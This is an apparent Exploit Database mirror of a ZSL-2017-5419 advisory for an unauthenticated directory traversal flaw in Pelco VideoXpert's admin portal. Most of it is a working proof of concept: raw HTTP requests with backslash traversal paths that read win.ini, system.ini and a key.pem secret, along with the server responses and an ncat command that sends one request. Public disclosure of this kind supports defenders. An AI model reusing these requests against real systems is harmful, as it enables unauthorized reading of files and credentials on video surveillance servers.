Pelco VideoXpert 1.12.105 – Directory Traversal

• Exploit Database
• 18 阅读

• 作者： LiquidWorm
  日期： 2017-07-10
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42311/

• Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
  
  
  Vendor: Schneider Electric SE
  Product web page: https://www.pelco.com
  Affected version: 2.0.41
  1.14.7
  1.12.105
  
  Summary: VideoXpert is a video management solution designed for
  scalability, fitting the needs surveillance operations of any size.
  VideoXpert Ultimate can also aggregate other VideoXpert systems,
  tying multiple video management systems into a single interface.
  
  Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
  Exploiting this issue will allow an unauthenticated attacker to
  view arbitrary files within the context of the web server.
  
  
  Tested on: Microsoft Windows 7 Professional SP1 (EN)
   Jetty(9.2.6.v20141205)
   MongoDB/3.2.10
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2017-5419
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
  
  
  05.04.2017
  
  --
  
  
  PoC:
  ----
  
  GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
  Host: 172.19.0.198
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  
  
  HTTP/1.1 200 OK
  Date: Wed, 05 Apr 2017 13:27:39 GMT
  Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
  Cache-Control: public, max-age=86400
  Content-Type: text/html; charset=UTF-8
  Vary: Accept-Encoding
  ETag: 1247548162000
  Content-Length: 403
  Connection: close
  
  ; for 16-bit app support
  [fonts]
  [extensions]
  [mci extensions]
  [files]
  [Mail]
  MAPI=1
  [MCI Extensions.BAK]
  3g2=MPEGVideo
  3gp=MPEGVideo
  3gp2=MPEGVideo
  3gpp=MPEGVideo
  aac=MPEGVideo
  adt=MPEGVideo
  adts=MPEGVideo
  m2t=MPEGVideo
  m2ts=MPEGVideo
  m2v=MPEGVideo
  m4a=MPEGVideo
  m4v=MPEGVideo
  mod=MPEGVideo
  mov=MPEGVideo
  mp4=MPEGVideo
  mp4v=MPEGVideo
  mts=MPEGVideo
  ts=MPEGVideo
  tts=MPEGVideo
  
  
  ------
  
  
  GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
  Host: 172.19.0.198
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  
  
  HTTP/1.1 200 OK
  Date: Thu, 06 Apr 2017 11:59:07 GMT
  Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
  Cache-Control: public, max-age=86400
  Content-Type: text/html; charset=UTF-8
  ETag: 1491397116000
  Content-Length: 9
  Connection: close
  
  T0ps3cret
  
  
  ------
  
  
  bash-4.4$ cat pelco_system_ini.txt
  GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
  Host: 172.19.0.198
  Accept: */*
  Accept-Language: en
  User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  Connection: close
  
  bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
  Ncat: Version 7.40 ( https://nmap.org/ncat )
  Ncat: Connected to 172.19.0.198:80.
  HTTP/1.1 200 OK
  Date: Thu, 06 Apr 2017 12:30:01 GMT
  Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
  Cache-Control: public, max-age=86400
  Content-Type: text/html; charset=UTF-8
  ETag: 1244668084000
  Content-Length: 219
  Connection: close
  
  ; for 16-bit app support
  [386Enh]
  woafont=dosapp.fon
  EGA80WOA.FON=EGA80WOA.FON
  EGA40WOA.FON=EGA40WOA.FON
  CGA80WOA.FON=CGA80WOA.FON
  CGA40WOA.FON=CGA40WOA.FON
  
  [drivers]
  wave=mmdrv.dll
  timer=timer.drv
  
  [mci]
  Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
  bash-4.4$